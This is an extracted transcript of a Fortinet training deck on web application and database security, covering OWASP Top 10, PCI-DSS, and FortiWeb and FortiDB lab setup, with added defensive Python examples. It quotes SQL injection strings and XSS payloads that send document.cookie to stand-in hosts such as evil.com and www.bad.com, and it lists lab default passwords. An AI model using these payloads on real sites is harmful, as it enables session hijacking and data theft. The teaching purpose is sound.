latam mx fortiweb fortidb training-v1.1
TRANSCRIPT
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
1/362
LATAM SE TEAM
FortiWeb and FortiDB
Training
1. Introduction to Web Application Security
2. Database Vulnerabilities & Misconfigurations
3. OWASP Top 10 and PCI-DSS
4. Lab Installation and Setup
5. Introduction to FortiWeb
6. How to PoC FortiWeb
7. FortiWeb Basic & Advanced Troubleshooting
7. Introduction to FortiDB
8. How to PoC FortiDB
9. FortiDB Basic & Advanced Troubleshooting
AGENDA
Introduction to Web Applications
What are Web Applications?
What are Web Applications?
Web applications are public and internet-facing applications.
Accessed using a standard browser, they provide webmail, online retail sales, online auctions, wikis and many other functions.
They provide major e-commerce and business driving tools for organizations.
Web apps are written for efficient delivery of content.
In most cases web apps are not developed with security in mind:
Leaves apps open to exploit
Potential exposure of sensitive information
Attacks can range from simple defacement to identity theft, credit card and other PII theft.
[Diagram: data center perimeter, front end web servers, database servers]
Web Applications Advantages
A standard Web Browser acts as the Application Client
Creates a virtual hyperspace beyond geographical constraints
Breaks computer hardware and software obstacles
Brings the whole world together
A low cost way to share, maintain, and distribute information
Intranet
Electronic commerce
Customer support
Web Applications Advantages
Client (front end):
Presents an interface to the user
Gathers information from the user, submits it to a server, then receives, formats, and presents the results returned from the server
User needs specific software to access data on the server (and a specific operating system, etc.)
The client connects to the server using specific ports
So, what are Client / Server Applications?
Server (back end): A database from which a client requests information
Fulfills a request for information by managing the request or serving the requested information to the client
Responsible for data storage and management
Only allowed users can retrieve data from the server (firewall policies, access control, etc.)
So, what are Client / Server Applications?
Adversaries have fewer obstacles when performing an attack
An infrastructure attack presents all the following obstacles:
A web application attack presents fewer obstacles and elements
Why are those differences important?
HTTP is a networking protocol, the foundation of the World Wide Web.
HTTP functions as a request/response protocol
HTTP defines nine methods
The methods GET and POST are the most widely used
GET Method: Requests a representation of the specified resource. Data is included in the URL requested:
GET http://www.xbank.com/get.html?uid=xxx HTTP/1.1
POST Method: Submits data to be processed to the identified resource. Data is included in the message body:
POST /login.php?username=User1&password=pass1 HTTP/1.1
Some Web Application Concepts
HTML documents are usually static, but Web Applications need dynamic documents:
Search results
Database access
Context sensitive reply
Client side / Server side execution:
Server-side: the action occurs at the server. The server runs a set of instructions and returns values to the browser.
Client-side: the action occurs on the client side (browser). The instructions are executed on the user's computer.
Some Web Application Concepts
Client side scripts are embedded inside the HTML document. They are interpreted by the browser.
When the Web browser encounters a script, it calls a scripting interpreter, which parses and deciphers the scripting code.
Provide responses to questions and queries without intervention from the server
Validate user data
Calculate expressions
Link to other applications
Client Side Scripting
Goal: Render and present content to the user
Software: Browsers (IE, Safari, Firefox, etc.)
Language: HTML/JavaScript, etc.
Client Side / Application Layer
Allows creation of dynamic web pages
Modifies HTML code on the server before it is sent to the client
Uses databases such as Access and Oracle
Responds to user input
Server Side Scripting
Goal: Receive user requests, validate, process and convert them into database requests
Software: Web Servers (Apache/IIS), Application Servers (Tomcat, WebSphere)
Language: Java/ASP/PHP
Server Side / Application Layer
Goal: Store and manage access to data.
Software: DBMS (Oracle, MS SQL Server, MySQL, etc.)
Language: SQL
Database / Data Layer
Input that requires validation: HTTP parameters, HTTP headers, database/filesystem input, configuration
Output that requires encoding: HTML / CSS / JavaScript / XML / images
Common Web Application Problems
Web Application Security
Are your Web Applications Secure?
Injection attacks trick an application into including unintended commands in the data sent to an interpreter.
Interpreters interpret strings as commands. Ex: SQL, LDAP, XPath
Key Idea: Input data from the application is executed as code by the interpreter
SQL Injections
1. App sends form to user
2. Attacker submits form with SQL exploit data
3. Application builds string with exploit data
4. Application sends SQL query to DB
5. DB executes query, including exploit, sends data back to application
6. Application returns data to user.
[Diagram: user and attacker submit the form through the firewall to the web server, which queries the DB server; the attacker's password field contains: Pass or 1=1--]
SQL Injections
Unauthorized Access Attempt:
password = ' or 1=1 --
SQL statement becomes:
select count(*) from users where username = 'user' and password = '' or 1=1 --
Checks if password is empty OR 1=1, which is always true, permitting access.
SQL Injection Attack # 1
Database Modification Attack:
password = foo'; delete from table users where username like '%
DB executes two SQL statements:
select count(*) from users where username = 'user' and password = 'foo'
delete from table users where username like '%'
SQL Injection Attack # 2
Exploits of a MOM
Cross Site Scripting (XSS) is a type of exploit where information from one context, where it is not trusted, can be inserted into another context, where it is.
The trusted website is used to store, transport, or deliver malicious content to the victim
The target is to trick the client browser into executing malicious scripting commands: JavaScript, VBScript, ActiveX, HTML, or Flash
Caused by insufficient input validation
Cross Site Scripting
Steal cookies: hijack the user's session, unauthorized access
Modify content of the web page: insert words or images, misinform, bad reputation
Spy on what you do
Network mapping
XSS viruses
Cross Site Scripting can:
1. Send e-mail with tags embedded in the link.
2. Victim follows the link and the script executes
Example link (cookie collector at www.badguy.com):
http://mybank.com/account.php?variable=>document.location=http://www.badguy.com/cgi-bin/cookie.cgi%20+document.cookie
Malicious content does not get stored in the server
The server bounces the original input to the victim without modification
Cross Site Scripting - Reflected
1. Attacker uploads malicious scripting commands to the public forum web site
2. Victim browses the forum
3. Victim downloads the malicious code
Example forum post (cookie stealer at www.bad.com):
Great message! var img=new Image();img.src="http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie;
The server stores the malicious content
The server serves the malicious content in its original form
Cross Site Scripting - Persistent
Cross-site request forgery, also known as a one-click attack or session riding, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
Cross Site Request Forgery
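One standard defence against the attack just described, as an added example for these notes and not part of the Fortinet material: a token derived from the session that a third-party page cannot obtain, checked on every state-changing request. `handle_save_transaction` is a hypothetical model of the lab's save_transaction.php; the session id, server secret and amounts are constructed.

```python
import hashlib
import hmac
import secrets

# Constructed server-side key; a real deployment loads it from configuration.
SERVER_SECRET = secrets.token_bytes(32)
SAFE_METHODS = ("GET", "HEAD", "OPTIONS")


def issue_csrf_token(session_id):
    """Derive a per-session token as HMAC-SHA256(secret, session id). The site
    embeds it in its own forms; another origin cannot read it, so it cannot
    reproduce it even though the browser still attaches the session cookie."""
    return hmac.new(SERVER_SECRET, session_id.encode("utf-8"),
                    hashlib.sha256).hexdigest()


def csrf_check(method, session_id, submitted_token):
    """Let safe methods through (they must not change state); for everything
    else require the token that matches the session the cookie identifies."""
    if method.upper() in SAFE_METHODS:
        return True
    if not session_id or not submitted_token:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), submitted_token)


def handle_save_transaction(request):
    """Hypothetical model of save_transaction.php. `request` is a dict with the
    HTTP method, the session id from the cookie and the submitted form fields.
    Returns the outcome as text instead of moving money."""
    form = request.get("form", {})
    if not csrf_check(request["method"], request.get("session"),
                      form.get("csrf_token")):
        return "rejected: missing or invalid CSRF token"
    return "transfer of %s accepted" % form["amount"]


def demo():
    """A legitimate submit and a forged one riding on the same session cookie."""
    session = "sess-hsimpson-0001"          # constructed session cookie value
    legit = {"method": "POST", "session": session,
             "form": {"amount": "100", "csrf_token": issue_csrf_token(session)}}
    # The attacker's page makes the victim's browser POST with the cookie
    # attached, but it never saw the token and so cannot include it.
    forged = {"method": "POST", "session": session, "form": {"amount": "9999"}}
    return handle_save_transaction(legit), handle_save_transaction(forged)


if __name__ == "__main__":
    print(demo())
```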
Samy Kamkar's JS worm from 2005. Payload: "but most of all, Samy is my hero"
Exponential growth:
7 hours, ~200 infected
12 hours, ~10K infected
17 hours, >1M infected
MySpace shuts down
Case Study: MySpace Samy Worm
Encoded JavaScript inside, disguised as Java script
Bypassed security using eval('document.body.inne' + 'rHTML')
Case Study: MySpace Samy Worm
MySpace implemented a blacklist:
Blacklisted many tags, but not , , and some others. So:
Blacklisted the word javascript. So:
Blacklisted innerHTML. document.body.innerHTML gives the page source. So: alert(eval('document.body.inne' + 'rHTML'))
Case Study: MySpace Samy Worm
DATA: 64% of 10M security incidents had port 80 as entry point
Some Reflections
Database Vulnerabilities and Misconfigurations
What about the Database?
RSA: proprietary information about RSA's SecurID authentication tokens. (2011)
Sony - PlayStation Network customers: more than 100 million customer account details and 12 million unencrypted credit card numbers. (2011)
HBGary Federal: 60,000 confidential emails, executive social media accounts, and customer information. (2011)
Epsilon: e-mail databases from 2 percent of the firm's 2,500 corporate clients. (2011)
June 7, 2011 - RSA Faces Angry Users After Breach: The nation's biggest banks and large technology companies like SAP rushed Tuesday to accept RSA Security's offer to replace their ubiquitous SecurID tokens as many computer security experts voiced frustration with the company.
Tue Apr 26, 2011 - Sony suffered a massive breach in its video game online network that led to the theft of names, addresses and possibly credit card data belonging to 77 million user accounts in what is one of the largest-ever Internet security break-ins.
2011-03-01 - The embattled CEO of HBGary Federal has resigned his post three weeks after Anonymous hacked into the company's network and stole thousands of e-mail messages.
April 02, 2011 - Major Breach at Epsilon, the World's Largest Permission Based Email Marketing Services Company, Affects Wide Range of Major Brands - List Continues to Grow
Database Heist
Common DB Vulnerabilities / Misconfigurations
Default, blank, and weak username/password
Removing default, blank and weak log-in credentials is an important first step for filling chinks in your database armor.
The bad guys are keeping track of default accounts, and they'll use them when they can.
Common DB Vulnerabilities / Misconfigurations
Extensive user and group privileges
Privileges should not be handed out to users who will end up collecting them like janitors collect keys on their keychains.
Make users part of groups or roles and administer the rights through those roles, which can be managed collectively more easily than if users were assigned direct rights.
Common DB Vulnerabilities / Misconfigurations
Unnecessarily enabled database features
Database installations come with add-on packages of all shapes and sizes that are mostly going to go unused by any one organization.
Database security is about reducing attack surfaces. Disable or uninstall those unused packages.
Common DB Vulnerabilities / Misconfigurations
Broken configuration management
Databases have many different configuration choices and considerations available to DBAs to fine-tune performance and enhance functionality.
Unsafe configurations could be enabled by default or turned on for the convenience of DBAs or application developers.
Common DB Vulnerabilities / Misconfigurations
Denial of Service / Buffer overflows
Buffer overflows are exploited by flooding input sources with far more characters than an application was expecting (like entering 100 characters into an input box asking for an SSN).
Database vendors have worked hard to fix the glitches that allow these attacks to occur (that's why patching is so critical).
Vertical / Gov.   Regulation(s)           High level requirements for databases
Finance           GLBA, Basel II          Activity monitoring/audit of customer records and account information residing in databases
Healthcare        HIPAA                   Monitoring/auditing access to patient data residing in databases
Pharma.           CFR part 11             Monitoring/auditing access to drug research data in databases
States            CA law 1386             Monitoring/auditing access to PID data residing in databases (for privacy of personal information)
Federal           FISMA (NIST 800-53A)    Assessment and implementation of various IT internal controls for databases

Cross industry    Regulation              High level requirements for databases
                  PCI                     PID data access monitoring in databases
                  SOX                     Auditing financial database transactions to ensure integrity of financial statements
Regulatory Environment
Securing Confidential Data: Social Security, credit card and revenue numbers all held in databases and applications (ERP, CRM, SCM, custom applications)
Automation of Auditing and Compliance: reporting for SOX, PCI and other regulations
Change Control: keep track of all changes related to database structures (DDL) and users (DCL)
Virtualization: support both virtualized and non-virtualized environments
Efficient Deployment and Management: low TCO
DB Activity Monitoring Requirements
OWASP Top 10 2010
1. Injection
2. Cross site scripting (XSS)
3. Broken authentication and session management
4. Insecure direct object reference
5. Cross site request forgery (CSRF)
6. Security misconfiguration
7. Insecure cryptographic storage
8. Failure to restrict URL access
9. Insufficient transport layer protection
10. Unvalidated redirects and forwards
OWASP Top 10 - 2010
[Diagram: injected input flows from the client through the application to the DB, shell, program and CPU]
A1 - Injections
String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") + "'";
id="foo';DROP accnts;--"
SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
id="foo"
SELECT * FROM accnts WHERE ID='foo';
A1 - Injections
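The Attack #1 / #2 slides and the A1 snippet above, worked in Python against an in-memory SQLite table as an added example (not code from the training): the string-built login falls to `' or 1=1 --` while the parameterized query treats it as data. The users table and its rows are constructed sample data.

```python
import sqlite3

# Constructed sample data: a tiny users table in the spirit of the xbank lab.
# Passwords are kept in clear text only so the injection mechanics stay visible;
# a real application stores a salted one-way hash (see A7 later in this deck).
SAMPLE_USERS = [("hsimpson", "1234"), ("admin", "fortidb1!$")]


def setup_db():
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_query_vulnerable(username, password):
    """The slide's pattern: user input is pasted into the SQL text, so a quote in
    the input closes the literal and everything after it is parsed as SQL."""
    return ("select count(*) from users where username = '" + username +
            "' and password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Authenticate with the string-built query (the deck's Attack #1 succeeds)."""
    row = conn.execute(build_query_vulnerable(username, password)).fetchone()
    return row[0] > 0


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver ships the values separately
    from the SQL text, so quotes and '--' are compared as data, never parsed."""
    query = "select count(*) from users where username = ? and password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] > 0


def demo():
    """Run a legitimate login and the Attack #1 payload against both versions."""
    conn = setup_db()
    payload = "' or 1=1 --"   # the password value from the Attack #1 slide
    return {
        "legit_vulnerable": login_vulnerable(conn, "hsimpson", "1234"),
        "legit_parameterized": login_parameterized(conn, "hsimpson", "1234"),
        "attack_vulnerable": login_vulnerable(conn, "nobody", payload),
        "attack_parameterized": login_parameterized(conn, "nobody", payload),
    }


if __name__ == "__main__":
    for name, granted in demo().items():
        print(f"{name}: {'access granted' if granted else 'access denied'}")
```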
[Diagram: browser, application and DB, with the script reflected back to a browser]
A2 Cross Site Scripting
(String) page += "";
CC=123456789">window.location=http://evil.com?x=document.cookie
CC=123456789"
A2 Cross Site Scripting
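The A2 snippet and the persistent-XSS forum post above, worked in Python as an added example for these notes (not the training's own code): the same input rendered by string concatenation and by entity encoding, plus a Samy-style blacklist to show why it is no substitute. The payloads are constructed to match the slides, with the `<script>` tags the extraction dropped; `BODY_TEMPLATE` and `INPUT_TEMPLATE` are assumed stand-ins for the page's markup.

```python
import html

# Constructed payloads modelled on the deck's persistent-XSS forum post and the
# A2 credit-card parameter (the slide extraction lost the <script> tags).
FORUM_POST = ('Great message!<script>var img=new Image();img.src='
              '"http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie;'
              '</script>')
CC_PARAM = '123456789">window.location=http://evil.com?x=document.cookie'

# Assumed templates standing in for the slide's  (String) page += "..."  line.
BODY_TEMPLATE = '<div class="post">{value}</div>'
INPUT_TEMPLATE = '<input name="CC" type="text" value="{value}">'


def render_unsafe(template, value):
    """Paste user input straight into the page: whatever it holds becomes markup."""
    return template.replace("{value}", value)


def render_encoded(template, value):
    """Entity-encode the input for an HTML body or a double-quoted attribute.
    html.escape(quote=True) rewrites < > & " and ' so the browser shows them as
    text instead of parsing them as tags or attribute delimiters."""
    return template.replace("{value}", html.escape(value, quote=True))


def blacklist_allows(value, banned=("<script", "javascript", "innerhtml")):
    """The MySpace-era input blacklist from the Samy case study, kept here to
    show its limit: the deck's split-string eval payload passes this check."""
    lowered = value.lower()
    return not any(word in lowered for word in banned)


def demo():
    """Summarise what each approach does with the constructed payloads."""
    samy = "alert(eval('document.body.inne' + 'rHTML'))"
    return {
        "unsafe_body_has_script": "<script>" in render_unsafe(BODY_TEMPLATE, FORUM_POST),
        "encoded_body_has_script": "<script>" in render_encoded(BODY_TEMPLATE, FORUM_POST),
        "unsafe_attr_breaks_out": '">window.location' in render_unsafe(INPUT_TEMPLATE, CC_PARAM),
        "encoded_attr_breaks_out": '">window.location' in render_encoded(INPUT_TEMPLATE, CC_PARAM),
        "blacklist_stops_forum_post": not blacklist_allows(FORUM_POST),
        "blacklist_stops_samy_eval": not blacklist_allows(samy),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```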
Unpredictable passwords, session IDs, security questions
No session IDs/credentials in URL
Avoid session fixation
Time out of sessions & logout buttons
Different session IDs outside/inside TLS
No clear text passwords
A3 Broken Authentication
[Screenshot: reports for 2010q1 and 2011q2]
period=2011q3
period=2011q2
A4 Insecure Direct Object Reference
Patching: OS, application, frameworks / libraries
Disable unnecessary services
Stack traces
Configuration
A6 Security Misconfigurations
Keep track of sensitive data
Password one-way-hashed & salted
Password/key management: TLS key pass phrase, M2M password (obfuscation)
A7 Insecure Cryptographic Storage
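The "one-way-hashed & salted" item above, worked in Python as an added example (not from the training): PBKDF2-HMAC-SHA256 with a random per-user salt, self-describing storage format and constant-time verification. `ITERATIONS` is a constructed work factor to tune per deployment.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 210_000   # constructed PBKDF2 work factor; raise as hardware allows
SALT_BYTES = 16


def hash_password(password, salt=None, iterations=ITERATIONS):
    """One-way hash with a per-user random salt. The stored string carries the
    algorithm, iteration count and salt, so verification needs no other state
    and the work factor can be raised later without breaking old records."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_password(password, stored):
    """Recompute the hash with the stored parameters and compare in constant
    time. Any malformed record is treated as a failed login, never an error."""
    try:
        algo, iterations, salt_b64, digest_b64 = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        iterations = int(iterations)
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
    except (ValueError, TypeError):
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    record = hash_password("1234")          # the lab user's constructed password
    print(record)
    print(verify_password("1234", record), verify_password("12345", record))
```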
/user/getAccounts
/admin/getAccounts
A8 Failure to restrict URL access
Use SSL/TLS
No mixed content
Use secure cookies
Example: FireSheep exploits poor solutions
A9 Insufficient Transport Layer Protection
http://www.vuln.com/redir.asp?=http://www.links.com
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
A10 Unvalidated Redirects and Forwards
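A redirect-target check for the two URLs above, added here as an example (not the training's code): the percent-encoded form decodes to www.google.com, so the check decodes before deciding and then accepts only same-site destinations. `ALLOWED_HOSTS` is an assumed allowlist for the vulnerable site.

```python
from urllib.parse import unquote, urlsplit

# Hosts this site may redirect to (constructed; the slide's site is www.vuln.com).
ALLOWED_HOSTS = {"www.vuln.com"}


def fully_decode(value, max_rounds=3):
    """Undo percent-encoding repeatedly but boundedly, so a double-encoded
    host such as %2577%2577%2577 is seen for what it is."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_redirect_target(target, default="/"):
    """Return `target` only if it stays on this site, otherwise `default`.
    Accepts absolute paths and http(s) URLs whose host is in ALLOWED_HOSTS."""
    if not target:
        return default
    decoded = fully_decode(target).replace("\\", "/")   # browsers treat \ as /
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: scheme and host must both be ours.
        if parts.scheme not in ("", "http", "https"):
            return default
        if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
            return default
        return decoded
    # Relative form: insist on one leading slash (no //host shorthand).
    if not decoded.startswith("/") or decoded.startswith("//"):
        return default
    return decoded


if __name__ == "__main__":
    for url in ("http://www.links.com",
                "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D",
                "/account/list_accounts.php"):
        print(url, "->", safe_redirect_target(url))
```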
PCI-DSS Application Security Requirements
Web Application Security and PCI
Requirement 6: Develop and maintain secure systems and applications
Patching
Configuration
Development lifecycle
Testing
Production
Web Application Security and PCI
Develop software applications based on industry best practices and incorporate information security throughout the software development life cycle.
6.3.1 Testing of all security patches
6.3.2 Separate development, test, and production environments
6.3.3 Separation of duties between development, test, and production
6.3.4 Live PANs are not used for testing or development
6.3.5 Removal of test data and accounts before production
6.3.6 Removal of custom application accounts, usernames, and passwords
6.3.7 Review of custom code prior to release to production or customers
Sub-requirement 6.3
Develop all web applications based on secure coding guidelines such as the Open Web Application Security Project (OWASP) guidelines. Review custom application code to identify coding vulnerabilities.
6.5.1 Unvalidated input
6.5.2 Broken access control (for example, malicious use of user IDs)
6.5.3 Broken authentication and session management (use of account credentials and session cookies)
6.5.4 Cross-site scripting (XSS) attacks
6.5.5 Buffer overflows
6.5.6 Injection flaws (for example, structured query language (SQL) injection)
6.5.7 Improper error handling
6.5.8 Insecure storage
6.5.9 Denial of service
6.5.10 Insecure configuration management
Sub-requirement 6.3
Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:
Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security
Installing an application layer firewall in front of web-facing applications.
Sub-requirement 6.6
Application Firewall = Web Application Firewall (WAF), not an application-layer firewall
What makes a WAF acceptable for PCI?
Meet all applicable PCI DSS requirements
React appropriately to threats
Inspect web application input and respond
Prevent data leakage
Enforce both positive and negative security models
Inspect Hypertext Markup Language (HTML), Dynamic HTML (DHTML), and Cascading Style Sheets (CSS)
Sub-requirement 6.6 - Clarifications
Initial Lab Configuration
VMnet 1 Host-Only Network
Host Machine: 2.2.2.1/24
VM Database & FortiDB: IP 2.2.2.20/24, Windows XP, Administrator/fortidb1!$, FortiDB admin/fortidb1!$
VM Web Server: IP 2.2.2.21/24, Ubuntu 10, xuser/xuser
FortiWeb: IP 2.2.2.15/24, FortiWeb-VM, admin/(blank password)
Lab Topology
From the USBs provided by Fortinet, download the compressed VMs: FWB_VM64bit, HTTP_Server, DB_Server
And the FortiDB installer: FDB_X86
You will need:
VMware Workstation 7/8/9
RAM: 4096 MB
Hard Disk: 20 GB
Hyper-Threading enabled
Preparing the VM Environment
Edit Network Interfaces
VMnet1 (Host only): 2.2.2.0/24
Customize VMWare Environment
Go to VM > Settings
Edit Network Adapter (1)
Point it to VMNET 1
Set the IP addresses asshown in the diagram
Windows DB Server
Ubuntu HTTP Server
FortiWeb
The Host Machine
Virtual Machines Connections
Press the Enter key once to get a new prompt, and log in using the default FortiWeb-VM administrator name, admin.
There is no password for the administrator; press Enter when prompted.
Use the CLI to configure the IP address of a virtual interface (port1):
config system interface
    edit port1
        set ip 2.2.2.15/24
end
FortiWeb Initial Configuration
One-Arm HTTP Proxy Topology
Gives us enough flexibility for our labs
Send traffic through the FortiWeb
Host Machine: 2.2.2.1/24
VM Database & FortiDB: IP 2.2.2.20/24, Windows XP, Administrator/fortidb1!$, FortiDB 4.2.1 admin/fortidb1!$
VM Web Server: IP 2.2.2.21/24, Ubuntu 10, xuser/xuser
FortiWeb: IP 2.2.2.15/24, FortiWeb-VM build0414, admin/(blank password)
Lab Flows
This flat network deployment is not recommended in a production environment since a client can easily bypass FortiWeb.
One-Arm HTTP Proxy Topology
Gives us enough flexibility for our labs
Send traffic straight to the Web Server
Host Machine: 2.2.2.1/24
VM Database & FortiDB: IP 2.2.2.20/24, Windows XP, Administrator/fortidb1!$, FortiDB 4.2.1 admin/fortidb1!$
VM Web Server: IP 2.2.2.21/24, Ubuntu 10, xuser/xuser
FortiWeb: IP 2.2.2.15/24, FortiWeb-VM build0414, admin/(blank password)
Lab Flows
Web Application: PHP/Apache
Database: MS SQL Server
Login URL: http://2.2.2.21/xbank/index.html
Login: hsimpson
Password: 1234
Xbank Online Banking Application
index.html: redirect to index.php?p=login.html
index.php: frameset
login.html: login page
topFrame.html: top frame
bottomFrame.html: bottom frame
verify_admin.php: authenticate customer
list_accounts.php: list customer's associated accounts
list_cards.php: list customer's associated cards
show_profile.php: show customer information
show_transaction.php: show transfer information
save_profile.php: save changed customer information
list_activity.php: list account activity
save_transaction.php: make transfer
Xbank Navigation Flow
XBANK_CUSTOMER: customer_id, customer_login, customer_password, customer_fname, customer_lname, customer_email, customer_address, customer_since
XBANK_ACCOUNT: account_id, account_number, account_type, account_balance, account_currency, customer_id, branch_id
XBANK_ACCOUNT_CARD: account_id, card_id
XBANK_ACTIVITY: activity_id, account_id, activity_timestamp, activity_type, activity_amount, activity_status
XBANK_BRANCH: branch_id, branch_name, branch_address
XBANK_CARD: card_id, card_number, card_type, card_cvd, card_expiration
Xbank Database Diagram
Physical Server: This is the real HTTP server (real IP address)
Virtual Server: This represents the HTTP server as it is seen by external network devices (similar to a Virtual IP)
Protected Server: Represents all IP addresses, hostnames, or FQDNs that might come in the Host field of the HTTP header
FortiWeb Servers Configuration
A note about Protected Servers!
It's important in multi-homed scenarios (same Virtual IP, same Physical IP): protected hosts allow defining different policies for different sites.
Be careful with NATed environments: when the site is accessed by IP address, the Host field value won't be the same as the Virtual IP address.
FortiWeb Servers Configuration
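An added model of the Protected Servers behaviour described above, written for these notes rather than taken from FortiWeb: the Host value is normalised and looked up against the configured hosts, and anything else receives the default action. `lab_walkthrough` reproduces the hosts-file exercise later in the deck, where www.xbank.com is denied until it is added; the names and IPs are the lab's, the function names are assumptions.

```python
VIRTUAL_IP = "2.2.2.50"      # the lab's virtual IP


def normalise_host(host_header):
    """Lower-case the Host value and strip an optional :port.
    Returns None when the header is absent or empty."""
    if not host_header or not host_header.strip():
        return None
    host = host_header.strip().lower()
    if host.startswith("["):                 # IPv6 literal such as [::1]:80
        return host.split("]")[0] + "]"
    return host.split(":")[0]


def protected_host_decision(host_header, protected_hosts, default_action="deny"):
    """`protected_hosts` maps a hostname or IP to 'accept' or 'deny'; a Host
    value that matches no entry gets `default_action` (Deny in the lab)."""
    table = {name.lower(): action for name, action in protected_hosts.items()}
    host = normalise_host(host_header)
    if host is None:
        return default_action
    return table.get(host, default_action)


def lab_walkthrough():
    """The lab before and after www.xbank.com is added as a protected host."""
    before = {VIRTUAL_IP: "accept"}
    after = {VIRTUAL_IP: "accept", "www.xbank.com": "accept"}
    return {
        "by_ip_before": protected_host_decision("2.2.2.50", before),
        "by_name_before": protected_host_decision("www.xbank.com", before),
        "by_name_after": protected_host_decision("www.xbank.com", after),
        "by_name_with_port": protected_host_decision("WWW.xbank.com:80", after),
        "no_host_header": protected_host_decision(None, after),
    }


if __name__ == "__main__":
    for step, decision in lab_walkthrough().items():
        print(f"{step}: {decision}")
```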
Physical Server Setup
1. Create a new Physical Server Object
2. Unique object name
3. Physical IP Address
Virtual Server Setup
1. Create a new Virtual Server Object
2. Unique Object Name
3. Virtual IP address
4. Listening Interface
Protected Servers Setup
1. Define Protected Servers
2. Unique Object Name
3. Default Action = Deny
4. Click OK to save
5. After saving click Create New
Protected Servers Setup (2)
1. Hostname used by client
2. Accept HTTP Traffic with hostname
3. Click OK to save
Protected Servers Setup (3)
Final Results
Create a Web Policy
1. Select Server Policy
2. Click Create New to create a new Server Policy
Create a Web Policy (2)
Policies are the glue that join Physical Servers, Virtual Servers, Protected Hosts and Protection Profiles: what are we protecting, and how.
1. Complete your policy as defined in the left image
2. Leave other fields as default
3. Click OK to save
Checking the Configuration
1. Enter virtual IP and URL path to test HTTP Proxy Settings
Checking the Configuration
1. After accessing the XBANK application, check your ARP table
Windows: run arp -a in a command window
Linux/Mac: run arp -an in a terminal
2. Note the MAC addresses for the IP address of your FortiWeb and your Virtual IP. Are they the same? Why?
Access using FQDN
1. Add an entry to your hosts table so www.xbank.com is resolved to 2.2.2.50 (Virtual IP)
Windows: %WINDIR%\System32\drivers\etc\hosts
Linux/Mac: /etc/hosts
2. Ping www.xbank.com. Does it work?
3. Access www.xbank.com using your browser. Does it work? Why?
4. Add a new entry in your protected server to accept requests to www.xbank.com
Final Results
FortiDB Installation (1)
Log in to your virtual machine with an administrator account
Execute the FortiDB installer and follow the on-screen instructions
FortiDB Installation (2)
FortiDB Installation (3)
Select installation path or leave default: C:\FortiDB
FortiDB Installation (4)
Select FortiDB internal repository. Use Derby in this case
FortiDB Installation (5)
Leave communication ports by default
FortiDB Installation (6)
FortiDB Installation (7)
FortiDB Installation (8)
FortiDB Installation (9)
FortiDB Installation (10)
Verify installation by logging in to FortiDB:
URL: http://2.2.2.20:9100/
UID: admin
PWD: fortidb1!$
FortiDB Initial Setup
LAB
admin
fortidb1!$
Monitoring xbankapp_db
1. Navigate to Targets
2. Click Add to specify a new DB Target
Monitoring xbankapp_db (2)
1. Fill required information according to the values in the figure
2. Complete credentials (sa/fortidb1!$)
3. Save
4. Test Connection
5. Validate test result
Monitoring xbankapp_db (3)
1. Navigate to Monitoring Management
2. Click on the database target
Monitoring xbankapp_db (4)
1. Select Collection Method
2. Specify Trace Folder location
Path to Trace Folder: C:\Program Files\Microsoft SQL Server\MSSQL10.XTREME_DB\MSSQL\Log
3. Test
4. Validate Test Result
5. Save
Monitoring xbankapp_db (5)
1. Go to Alert Policy Groups (Double Click)
2. Select Monitoring Policy Groups
3. Save
Monitoring xbankapp_db (6)
1. Go to Alert Policies tab (Double Click)
2. Click check box to enable all policies
3. Click Enable to save
Monitoring xbankapp_db (7)
1. Navigate to General Tab
2. Select Start monitoring when FortiDB starts & click the Start Monitoring button
3. Save
Monitoring check
1. Navigate back to Monitoring Management
3. You should end up with a green monitoring status indicator
Introduction to FortiWeb
What is Application Security?
Application life-cycle focus (mitigating control):
Design, development, deployment, upgrade, maintenance
Ideal but too late: difficult, lengthy, expensive
Legacy apps? Who has responsibility? Proprietary software, off the shelf, cloud offering
Application controls focus (compensating control):
Mitigation of threats (technical / functional)
Web applications security policy
Application Security Needs a New Approach
Network Firewall (network layer, OSI 1-3): network firewalls detect network attacks; inspect IP and port
IPS/Deep Packet Inspection Firewalls: IPS products detect known signatures only; signature evasion is possible; no protection of SSL traffic; no real HTTP understanding (headers, parameters, etc.); no application awareness; no user awareness; high rate of false positives
FortiWeb Web Application Firewall (application layer, OSI 4-7): only Web Application Firewalls can detect and block application attacks!
Introducing - FortiWeb Web Application Firewall
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
113/362
Web Application Firewall (WAF): secures web applications to help customers meet compliance requirements
- Secures web applications
